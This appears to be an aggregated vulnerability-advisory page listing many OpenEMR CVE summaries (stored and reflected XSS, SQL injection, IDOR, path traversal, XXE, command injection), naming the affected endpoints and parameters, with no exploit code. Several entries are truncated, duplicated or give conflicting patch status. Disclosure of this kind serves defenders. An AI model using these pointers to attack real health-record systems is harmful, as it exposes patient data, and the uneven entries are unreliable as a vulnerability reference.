Openemr

Stored cross-site scripting in OpenEMR before 8.0.0.1 lets an authenticated patient portal user inject HTML/JavaScript into demographic fields via the PUT api/patient/:num endpoint, which fires later in a clinician's authenticated session when the prescription CSS/HTML multi-print feature renders the patient name and address without output encoding. Because the payload executes inside the main OpenEMR UI under the clinician's session, the attacker crosses the patient-to-clinician trust boundary and can steal CSRF tokens, exfiltrate session data, and perform privileged actions as the clinician. SSVC currently rates exploitation as POC, no public exploit identified at time of analysis, and EPSS is 0.03% (9th percentile), but the cross-tenant trust crossing in a healthcare app makes the issue material for any internet-exposed deployment.

OpenEMR versions prior to 8.0.0.3 contain an improper access control vulnerability in the Import/Export functionality that allows authenticated users to bypass UI restrictions and perform unauthorized import and export operations through direct request manipulation. An attacker with valid credentials can extract bulk patient data, access sensitive health records, or modify system data despite not having explicit permissions for these actions. The vulnerability requires valid authentication (PR:L in CVSS) but enables significant data exfiltration and integrity violations once access is obtained.

A reflected cross-site scripting (XSS) vulnerability exists in the custom template editor of OpenEMR, a widely-deployed open-source electronic health records system. Attackers can craft malicious URLs that, when clicked by authenticated staff members, execute arbitrary JavaScript within their browser sessions and gain access to sensitive medical data and system functions; notably, the attacker does not require an OpenEMR account themselves. The vulnerability affects OpenEMR versions 7.0.2.1 through 8.0.0.2, and while there is no evidence of active exploitation in the wild or public proof-of-concept code, the moderate CVSS score of 6.1 combined with the user-interaction requirement and the context-sensitive nature of healthcare data makes this a meaningful priority for healthcare organizations.

A stored cross-site scripting (XSS) vulnerability exists in OpenEMR's CCDA document preview functionality that allows authenticated attackers to execute arbitrary JavaScript in clinician browser sessions. OpenEMR versions prior to 8.0.0.3 are affected. The vulnerability occurs because the XSL stylesheet fails to sanitize linkHtml attributes in CCDA documents, allowing javascript: URLs and event handlers to execute when documents are previewed.

Low-privilege authenticated users in OpenEMR versions up to and including 8.0.0.3 can view and download Ensora eRx error logs due to missing authorization checks, exposing sensitive healthcare system information. This broken access control vulnerability (CVSS 7.7) affects network-accessible installations and has a 3% EPSS exploitation probability (8th percentile), with no public exploit identified at time of analysis. No vendor-released patch identified at time of analysis according to the CVE disclosure.

OpenEMR portal payment pages prior to version 8.0.0.3 expose other patients' protected health information (PHI) and payment card metadata through an Insecure Direct Object Reference vulnerability. Authenticated portal patients can manipulate the `recid` query parameter in `portal/portal_payment.php` to access arbitrary patient payment records and billing data without authorization. The vulnerability affects all versions before 8.0.0.3 and carries a CVSS score of 6.5 (high confidentiality impact); however, the 0.03% EPSS score indicates low real-world exploitation probability, and no public exploit code or active exploitation has been identified.

Improper access control in OpenEMR versions prior to 8.0.0.3 allows any authenticated user to download and permanently delete electronic claim batch files containing protected health information (PHI) via the billing file-download endpoint, regardless of whether they have billing privileges. The vulnerability has a 7.6 CVSS score with low attack complexity and requires only low-level authentication. EPSS exploitation probability is 0.03% (8th percentile), indicating low observed targeting in real-world exploitation at time of analysis, and no public exploit has been identified.

SQL injection in OpenEMR versions prior to 8.0.0.3 enables authenticated attackers to execute arbitrary SQL commands through the CAMOS form's ajax_save functionality, potentially leading to complete database compromise including extraction of sensitive health records, data modification, and service disruption. The vulnerability requires low-privilege authentication (PR:L) with no user interaction (UI:N) and is network-exploitable (AV:N), though EPSS assigns only 0.03% (8th percentile) exploitation probability and no public exploit identified at time of analysis. Vendor-released patch available in version 8.0.0.3.

OpenEMR versions prior to 8.0.0.3 allow authenticated API users to bypass administrative access controls on five insurance company management REST API endpoints due to missing authorization checks. An attacker with valid API credentials but non-administrative OpenEMR privileges can create, read, and modify insurance company records without proper permission validation. The vulnerability requires prior authentication and affects data integrity rather than confidentiality or availability; no public exploit code has been identified, and exploitation probability is very low (EPSS 0.02%).

A blind SQL injection vulnerability exists in the PostCalendar module of OpenEMR, a widely-used open source electronic health records system. Versions prior to 8.0.0.3 are affected, allowing authenticated administrators to execute arbitrary SQL commands through the categoriesUpdate function's dels parameter. The vulnerability requires high privileges (PR:H) but is network-accessible and has no attack complexity, enabling attackers to extract sensitive patient data, modify health records, or disrupt medical operations.

OpenEMR versions prior to 8.0.0.3 contain an XML External Entity (XXE) injection vulnerability in the Carecoordination module that allows authenticated users to read arbitrary files from the server. Attackers can exploit this by uploading a maliciously crafted CCDA document containing XXE payloads to access sensitive server files such as /etc/passwd. A patch is available in version 8.0.0.3, and this vulnerability has a CVSS score of 7.7 with high confidentiality impact.

OpenEMR versions prior to 8.0.0.3 contain a stored cross-site scripting (XSS) vulnerability in form handling that allows authenticated attackers to inject malicious JavaScript into forms, which executes in the browser sessions of victims who submit those forms. An attacker with valid OpenEMR credentials can craft a malicious form that, upon submission by any user, executes arbitrary JavaScript with the privileges of the victim's session, potentially leading to session hijacking, credential theft, or unauthorized actions within the electronic health records system. The vulnerability is low-to-moderate severity (CVSS 5.4) due to the requirement for authentication and user interaction, but it poses significant risk in healthcare environments where attackers may have legitimate credentials and victims include healthcare providers with broad system access.

This is a stored/reflected cross-site scripting (XSS) vulnerability in OpenEMR versions prior to 8.0.0.3 where the POST parameter 'title' is improperly encoded in JSON responses but served with a text/html Content-Type header, causing browsers to execute injected JavaScript rather than treat the output as data. An authenticated attacker can craft a malicious request to execute arbitrary JavaScript in a victim's session, potentially leading to session hijacking, credential theft, or unauthorized actions within the electronic health records system. The vulnerability carries a moderate CVSS score of 5.4 but requires authentication and user interaction (UI:R), reducing immediate exploitation likelihood, though a proof-of-concept fix commit is available in the GitHub repository.

OpenEMR versions up to and including 8.0.0.2 contain a SQL injection vulnerability in the patient selection feature that allows authenticated attackers with high privileges to execute arbitrary SQL commands. The vulnerability stems from insufficient input validation and can lead to complete compromise of confidentiality, integrity, and availability of the healthcare database. No evidence of active exploitation (not in CISA KEV) or public proof-of-concept is currently available.

OpenEMR versions prior to 8.0.0.3 contain a SQL injection vulnerability in the MedEx recall/reminder processing code where user-controlled variables are concatenated directly into SQL queries without parameterization or type casting. An authenticated attacker with high privileges can exploit this to extract, modify, or delete sensitive healthcare data from the database. While the CVSS score of 5.9 is moderate, the attack requires high privilege level (PR:H) and high complexity (AC:H), but the confidentiality and integrity impacts are severe given the medical context.

A stored cross-site scripting (XSS) vulnerability exists in OpenEMR's Eye Exam form functionality that allows authenticated users with the 'Notes - my encounters' role to inject malicious JavaScript payloads through form answers. OpenEMR versions prior to 8.0.0.3 are affected. Attackers can execute arbitrary JavaScript in the browsers of other authenticated users when they view the compromised encounter pages or visit history, potentially leading to session hijacking, credential theft, or unauthorized actions within the EHR system.

A remote code execution vulnerability in OpenEMR (CVSS 5.4) that allows any authenticated openemr user. Remediation should follow standard vulnerability management procedures.

An authorization bypass vulnerability in OpenEMR versions prior to 8.0.0.2 allows authenticated non-administrator users to access reminder messages and associated patient information belonging to other users by manipulating GET request parameters. Any authenticated user can view sensitive data including patient names and message content from arbitrary user accounts without proper authorization checks. This vulnerability has a CVSS score of 6.5 (Medium) with high confidentiality impact but no integrity or availability impact, and a proof-of-concept has been published via the GitHub security advisory.

Stored XSS in OpenEMR versions before 8.0.0.2 allows authenticated patient portal users to inject malicious scripts into their login username, which execute in the browsers of clinic staff when viewing the portal credential creation page. This vulnerability enables attackers to compromise staff and admin sessions through the patient context, potentially leading to unauthorized access or data manipulation within the healthcare system. A patch is available in version 8.0.0.2 and later.

A remote code execution vulnerability in OpenEMR (CVSS 8.1). High severity vulnerability requiring prompt remediation.

OpenEMR versions prior to 8.0.0.2 allow authenticated users with the Notes role to trigger an out-of-band Server-Side Request Forgery (SSRF) vulnerability through unescaped HTML parsing in Eye Exam form PDF generation, enabling attackers to forge requests to arbitrary internal or external resources from the affected server. This vulnerability requires valid user credentials but no user interaction, and can lead to information disclosure or further internal network compromise. No patch is currently available for affected deployments.

A remote code execution vulnerability in OpenEMR (CVSS 8.1). High severity vulnerability requiring prompt remediation.

Stored XSS in OpenEMR prior to 8.0.0.2 allows authenticated users with the "Notes - my encounters" role to inject malicious JavaScript into Eye Exam form fields, which executes when other users with the same role view the form responses. An attacker can exploit this to steal session tokens, perform unauthorized actions, or compromise patient data through form manipulation. No patch is currently available for affected versions.

DOM-based stored XSS in OpenEMR's SearchHighlight plugin (versions prior to 8.0.0.2) enables authenticated users with encounter form write access to inject malicious JavaScript that executes in other clinicians' browsers during report searches. An attacker can leverage this to steal session tokens, modify patient data, or perform actions on behalf of targeted medical staff. The vulnerability stems from improper handling of HTML entity decoding when parsing search results.

Command injection in OpenEMR's backup functionality (versions prior to 8.0.0.2) allows authenticated high-privilege users to execute arbitrary commands on the underlying system due to insufficient input validation. The CVSS 9.1 critical rating reflects the potential for complete system compromise, though exploitation requires valid administrative credentials. No patch is currently available for affected versions.

OpenEMR versions prior to 8.0.0.2 contain an authorization bypass vulnerability in the encounter vitals API that allows authenticated users with encounters/notes permissions to overwrite any patient's vital signs by supplying another patient's vital ID in the request body. This constitutes medical record tampering with integrity implications rated CVSS 6.5. No evidence of active exploitation in KEV or public POC availability was identified in the provided intelligence, though the vulnerability is straightforward to exploit given valid API credentials.

OpenEMR versions up to 8.0.0 contain an authorization bypass vulnerability in the message/note update endpoints that allows authenticated users with notes permissions to modify any patient's messages without proper access control verification. An attacker can exploit this by supplying arbitrary message IDs in PUT or POST requests, enabling unauthorized modification of other patients' medical records. This is a moderate-risk issue (CVSS 6.5) with integrity impact on sensitive healthcare data, though exploitation requires existing authentication and notes permissions.

OpenEMR versions prior to 8.0.0.1 contain a SQL injection vulnerability in the ajax graphs library that allows authenticated users to execute arbitrary database queries, potentially leading to complete compromise of patient health records and system data. The vulnerability stems from insufficient input validation and requires valid credentials to exploit, but poses a critical risk given the sensitive nature of healthcare data stored in OpenEMR systems. No patch is currently available for affected versions.

OpenEMR versions prior to 8.0.0.1 contain an inverted boolean condition in the access control logic that allows any authenticated user to access administrative CDR controllers (alerts, ajax, edit, add, detail, browse) intended for administrators only. Affected users can suppress clinical decision support alerts, delete or modify clinical plans, and edit rule configurations without proper authorization. No patch is currently available for this high-severity vulnerability.

Stored cross-site scripting in OpenEMR versions prior to 8.0.0.1 allows authenticated users with Track Anything feature access to inject malicious scripts into item names that execute in the browsers of all users viewing the corresponding Dygraph charts. An attacker with create or edit permissions can craft payloads that run in victims' sessions without their knowledge, potentially enabling session hijacking or unauthorized actions within the application. No patch is currently available for affected versions.

Stored cross-site scripting (XSS) in OpenEMR prior to 8.0.0.1 allows administrators or users with code management privileges to inject malicious scripts into code descriptions that execute in the browsers of all users accessing the dynamic code picker. All OpenEMR instances running affected versions are at risk, as any authenticated admin can inject payloads affecting the entire user base. No patch is currently available for this vulnerability.

OpenEMR versions prior to 8.0.0.1 fail to properly enforce access controls on group encounters due to sensitivity checks only querying the wrong database table, allowing authenticated users to view restricted medical records such as mental health encounters they should not access. The vulnerability affects multi-user deployments where role-based restrictions are relied upon to protect sensitive patient information. No patch is currently available for affected versions.

OpenEMR versions prior to 8.0.0.1 fail to properly enforce access controls on the Claim File Tracker AJAX endpoint, allowing authenticated users without billing permissions to retrieve sensitive claim metadata including claim IDs, payer information, and transmission logs. An authenticated attacker with minimal privileges can access confidential billing information that should be restricted to authorized billing staff. No patch is currently available for affected installations.

Stored DOM-based cross-site scripting (XSS) in OpenEMR prior to version 8.0.0.1 allows authenticated attackers with low privileges to inject malicious scripts through unsanitized patient names in the portal signing component, which are rendered client-side via jQuery. Successful exploitation requires user interaction and could enable attackers to perform actions in the context of affected users or steal sensitive health information. A patch is available in OpenEMR 8.0.0.1 and later versions.

Stored XSS in OpenEMR's Pain Map form prior to version 8.0.0.1 allows authenticated users to inject malicious JavaScript into encounter records that executes when other clinicians view the affected form. Since session cookies lack HttpOnly protection, attackers can hijack sessions of other users including administrators. This vulnerability requires user interaction and network access but poses significant risk in multi-user healthcare environments.

Information disclosure in OpenEMR 5.0.2 to before 8.0.0 exposes sensitive data. PoC and patch available.

Unauthenticated token disclosure in OpenEMR before 8.0.0. CVSS 10.0. PoC and patch available.

Path traversal in OpenEMR 7.0.4 disposeDocument() allows file access. PoC available.

OpenEMR versions prior to 8.0.0 allow authenticated portal users to access other patients' protected health information through insecure direct object references (IDOR) in the payment portal, enabling horizontal privilege escalation to view and modify another patient's demographics, invoices, and payment history. The vulnerability stems from accepting patient ID values from user-controlled request parameters instead of validating against the authenticated user's session. Public exploit code exists for this vulnerability.

OpenEMR versions up to 8.0.0 contain a path traversal vulnerability in the fax sending functionality that allows authenticated users to exfiltrate arbitrary files from the server, including database credentials, patient records, and source code. The fax endpoint fails to validate or restrict file paths, enabling attackers to read and transmit sensitive data to attacker-controlled phone numbers. Public exploit code exists for this vulnerability, and a patch is available.

Authenticated users in OpenEMR through version 8.0.0 can access and modify eye exam records belonging to other patients by manipulating form IDs, bypassing patient context validation. This allows disclosure or alteration of sensitive medical data across the patient database, and public exploit code exists for this vulnerability. A patch is available on the main branch of the OpenEMR repository.

Openemr versions up to 8.0.0 is affected by authorization bypass through user-controlled key (CVSS 6.5).

Openemr versions up to 8.0.0 is affected by authorization bypass through user-controlled key (CVSS 6.5).

Openemr versions up to 8.0.0 is affected by authorization bypass through user-controlled key (CVSS 7.1).

SQL injection in OpenEMR versions before 8.0.0 allows authenticated users to execute arbitrary database queries through the prescription listing feature due to improper input validation. An attacker with valid credentials could exploit this to read, modify, or delete sensitive medical records and patient data. Public exploit code exists for this vulnerability; administrators should upgrade to version 8.0.0 immediately.

Stored XSS in OpenEMR prior to version 8.0.0 allows authenticated users with "Forms administration" role to inject malicious JavaScript into patient encounter forms, which executes when other users with the same role view the affected data. Public exploit code exists for this vulnerability. The issue is resolved in version 8.0.0.

OpenEMR prior to version 8.0.0 fails to enforce session expiration when the skip_timeout_reset parameter is present in requests, allowing expired sessions to remain active indefinitely. An attacker with a stolen session cookie can exploit this by continuously sending the skip_timeout_reset parameter to maintain unauthorized access to sensitive health records without being logged out. Public exploit code exists for this vulnerability with a CVSS score of 7.5.

OpenEMR versions prior to 8.0.0 allow any authenticated user to view all internal messages and notes from other users by exploiting insufficient authorization checks on the Message Center's `show_all` parameter. The vulnerability exists because the application does not verify administrator privileges before returning the complete message list, enabling unauthorized disclosure of sensitive medical communications. Public exploit code exists for this medium-severity information disclosure vulnerability.

OpenEMR versions prior to 8.0.0 fail to enforce API authorization checks on document and insurance endpoints, allowing any authenticated API client to read and modify all patient PHI regardless of assigned access controls. Public exploit code exists for this vulnerability, which affects healthcare organizations using OpenEMR's REST API. An attacker with valid API credentials can access sensitive medical records and insurance information across the entire patient database.

SQL injection in OpenEMR electronic health records before fix. Authenticated users can execute arbitrary SQL through the medical records system. PoC and patch available.

OpenEMR versions prior to 8.0.0 contain an authorization bypass in the patient portal that allows authenticated users to forge provider signatures by uploading files with admin-signature type parameters for any provider. Public exploit code exists for this vulnerability, which could enable signature forgery on medical documents, creating legal and compliance risks. Upgrade to version 8.0.0 or later to remediate this high-severity flaw.

OpenEMR versions prior to 8.0.0 contain an authorization bypass in the FHIR CareTeam endpoint that allows authenticated users with patient-scoped tokens to retrieve care team information for all patients rather than only their own, potentially exposing Protected Health Information across the entire system. The vulnerability exists because the service fails to enforce patient compartment filtering, and public exploit code is available. Security professionals should prioritize patching to version 8.0.0 or later to prevent unauthorized PHI disclosure.

SQL injection in OpenEMR's Immunization module prior to version 8.0.0 enables authenticated users to execute arbitrary database queries through unparameterized patient_id inputs. This allows attackers to exfiltrate protected health information, steal credentials, and potentially achieve remote code execution with complete database compromise. Public exploit code exists for this vulnerability; organizations should upgrade to version 8.0.0 immediately.

OpenEMR versions prior to 8.0.0 expose complete contact details for all users, organizations, and patients to authenticated attackers with specific FHIR export and location read permissions. The vulnerability requires administrator-enabled OAuth2 confidential client access, limiting exploitation to high-trust server-to-server integrations with established relationships. This information disclosure affects OpenEMR deployments since 2023 and can be mitigated by upgrading to version 8.0.0 or later.

OpenEMR versions prior to 8.0.0 contain a broken access control flaw in the order types management system that allows low-privilege users (such as receptionists) to create and modify procedure types without proper authorization. Public exploit code exists for this vulnerability, which has a CVSS score of 8.8 and could enable unauthorized users to manipulate critical medical procedure data. The vulnerability has been patched in version 8.0.0 and later.

OpenEMR versions prior to 8.0.0 fail to properly enforce permission checks, allowing authenticated users to access sensitive information belonging to other authorized users. The vulnerability requires valid credentials and network access but does not enable data modification or denial of service. Public exploit code exists and a patch is available in version 8.0.0 and later.

OpenEMR prior to version 8.0.0 allows low-privileged users to export sensitive patient and medical data through the message_list.php report functionality due to missing access controls. The vulnerability affects receptionists and similar roles who can bypass authorization checks to extract entire message databases containing confidential information. Public exploit code exists for this issue, though a patch is available in version 8.0.0 and later.

OpenEMR versions before 8.0.0 contain an improper access control flaw in the edih_main.php endpoint that allows any authenticated user, including low-privilege accounts like Receptionists, to retrieve sensitive EDI log files by manipulating the log_select parameter. The vulnerability bypasses role-based access controls that should restrict access through the GUI, enabling unauthorized disclosure of system logs. Public exploit code exists for this issue, which is fixed in version 8.0.0.

Path traversal in OpenEMR electronic health records before fix allows authenticated users to read arbitrary files on the server, potentially exposing patient health data. PoC and patch available.

Openemr versions up to 8.0.0 is affected by url redirection to untrusted site (open redirect) (CVSS 6.1).

Cross-site scripting (XSS) in OpenEMR prior to version 8.0.0 allows unauthenticated attackers to inject malicious scripts through the translation database, as the `xl()` function returns unescaped strings that are used directly in the application without proper context-specific escaping. An attacker with database access could exploit this to execute arbitrary JavaScript in users' browsers and compromise sensitive patient data or application functionality. The vulnerability is resolved in OpenEMR 8.0.0 and later versions.

OpenEMR is a free and open source electronic health records and medical practice management application. [CVSS 8.7 HIGH]

Openemr versions up to 7.0.4 is affected by user interface (ui) misrepresentation of critical information (CVSS 5.0).

OpenEMR is a free and open source electronic health records and medical practice management application. [CVSS 8.1 HIGH]

OpenEMR is a free and open source electronic health records and medical practice management application. Versions 5.0.0.5 through 7.0.3.4 have a stored cross-site scripting vulnerability in the ub04 helper of the billing interface. [CVSS 5.4 MEDIUM]

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a broken access control in the Profile Edit endpoint. [CVSS 8.8 HIGH]

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 7.0.4 have a vulnerability where sensitive data is unintentionally revealed to unauthorized parties. [CVSS 6.5 MEDIUM]

OpenEMR 5.0.2.1 contains a cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript through user profile parameters. [CVSS 5.4 MEDIUM]

OpenEMR is a free and open source electronic health records and medical practice management application. Rated high severity (CVSS 7.6), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

OpenEMR is a free and open source electronic health records and medical practice management application. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

OpenEMR is a free and open source electronic health records and medical practice management application. Rated high severity (CVSS 7.6), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

OpenEMR 7.0.2 is vulnerable to SQL Injection via \openemr\library\classes\Pharmacy.class.php, \controllers\C_Pharmacy.class.php and \openemr\controller.php. Rated critical severity (CVSS 9.8), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

OpenEMR is a free and open source electronic health records and medical practice management application. Rated high severity (CVSS 7.0), this vulnerability is remotely exploitable. Public exploit code available and no vendor patch available.

OpenEMR is a free and open source electronic health records and medical practice management application. Rated medium severity (CVSS 6.9), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.

OpenEMR is a free and open source electronic health records and medical practice management application. Rated high severity (CVSS 8.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

OpenEMR is a free and open source electronic health records and medical practice management application. Rated medium severity (CVSS 6.4), this vulnerability is remotely exploitable. Public exploit code available.

OpenEMR is a free and open source electronic health records and medical practice management application. Rated high severity (CVSS 7.2), this vulnerability is remotely exploitable. Public exploit code available.

OpenEMR is a free and open source electronic health records and medical practice management application. Rated medium severity (CVSS 4.6), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.